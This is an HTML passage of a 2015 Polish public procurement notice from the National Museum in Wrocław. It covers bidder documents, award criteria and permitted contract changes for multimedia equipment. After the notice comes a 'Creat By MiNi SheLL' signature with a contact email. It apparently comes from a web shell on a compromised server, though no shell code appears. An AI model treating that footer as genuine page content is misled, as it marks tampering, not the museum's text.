</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający wymaga, aby Wykonawca załączył do oferty dokumenty przedmiotowe dot. przedmiotu zamówienia: karty katalogowe oferowanego sprzętu multimedialnego potwierdzające wymagane parametry przez Zamawiającego w projekcie wykonawczym; dopuszcza się wydruki ze strony internetowej producenta, na której widoczny jest link do jego strony karty katalogowe, wydruki muszą być poświadczone przez Wykonawcę.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (dokument w formie oryginału) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (w formie oryginału) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, z którego wynikać będzie jednoznacznie: 1) zakres dostępnych wykonawcy zasobów innego podmiotu, 2) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 3) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 4) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. 2. W przypadku udzielenia pełnomocnictwa - pełnomocnictwo w formie oryginału lub notarialnie potwierdzonej kopii oraz podpisane przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Długość gwarancji na obudowę i aplikacje - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia postanowień niniejszej umowy mogą być dokonywane w granicach określonych w art. 144 ust. 1 ustawy Prawo zamówień publicznych. 
2. Zamawiający przewiduje i dopuszcza możliwość dokonania istotnych zmian  postanowień zawartej  umowy w oparciu o art.144  Prawa zamówień publicznych  w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w następującym zakresie:
1) Zmiana stawki urzędowej podatku VAT, przy czym zmianie ulega kwota podatku VAT i kwota brutto, kwota netto pozostaje bez zmian.
2) Konieczności zastąpienia jednej z osób wymienionych w wykazie, o którym mowa w §1 ust. 3 pkt 1 wzoru umowy. Osoba wskazana przez Wykonawcę jako zastępująca musi spełniać odpowiednie wymagania określone w Dziale V ust.1 pkt. 3 SIWZ.
3) Zmiana terminu realizacji umowy w przypadku:
a) zmiany przepisów prawa mających wpływ na termin wykonania przedmiotu umowy;
b) działań osób trzecich uniemożliwiających wykonanie prac, które nie są konsekwencją winy którejkolwiek ze Stron;
c) przestojów i opóźnień powstałych z przyczyn niezależnych od Wykonawcy, mających bezpośredni wpływ na terminowość wykonania zamówienia. Zmiana terminu skutkuje przedłużeniem o okres przestojów i opóźnień; 
d) realizacji, w drodze odrębnych umów, prac powiązanych z przedmiotem niniejszej umowy wymuszających konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań;
e) zaistnienia przeszkód spowodowanych siłą wyższą tj. zdarzeniem zewnętrznym, niemożliwym do przewidzenia, (co obejmuje również nikłe prawdopodobieństwo jego zajścia w danej sytuacji) i niemożliwym do zapobieżenia. Strony za okoliczności siły wyższej uznają min: powódź, huragan lub trąba powietrzna, trzęsienie ziemi, upadek statku powietrznego, pożar, działania wojenne lub ogłoszenie stanu wojennego, strajk ogólnokrajowy lub ogłoszony stan klęski żywiołowej.
f) uzgodnień pomiędzy Stronami dotyczących skrócenia terminu wykonania zamówienia. Zmiana skutkuje skróceniem terminu o uzgodniony okres bez zmiany wynagrodzenia;
4) Zmiany w zakresie podwykonawstwa - gdy zachodzi konieczność zmiany w zakresie podwykonawstwa, za uprzednią zgodą zamawiającego, możliwe jest powierzenie podwykonawcom innego zakresu części zamówienia niż wskazany w ofercie Wykonawcy, a także możliwa jest zmiana podwykonawcy na etapie realizacji zamówienia, z zastrzeżeniem art. 36b ustawy Pzp. 
5) Zmiany umowy w związku z przekształceniem firmy lub wynikające z następstwa prawnego, zgodnie z obowiązującymi przepisami; 
3. Wszelkie zmiany umowy określone w niniejszym paragrafie nie będą wywoływały zmian wartości przedmiotu umowy tj.  nie wpływają na wysokość wynagrodzenia Wykonawcy. Zamawiający zastrzega, iż zmiana umowy w zakresie finansowym jest niedopuszczalna, z zastrzeżeniem okoliczności, o której mowa powyżej w pkt..2 pkt.1).
4. Wszystkie powyższe okoliczności i postanowienia  opisane w ust. 2 niniejszego paragrafu stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mnwr.art.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50-153 Wrocław..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2015 godzina 09:00, miejsce: Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50-153 Wrocław Sekretariat (pokój nr 12).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com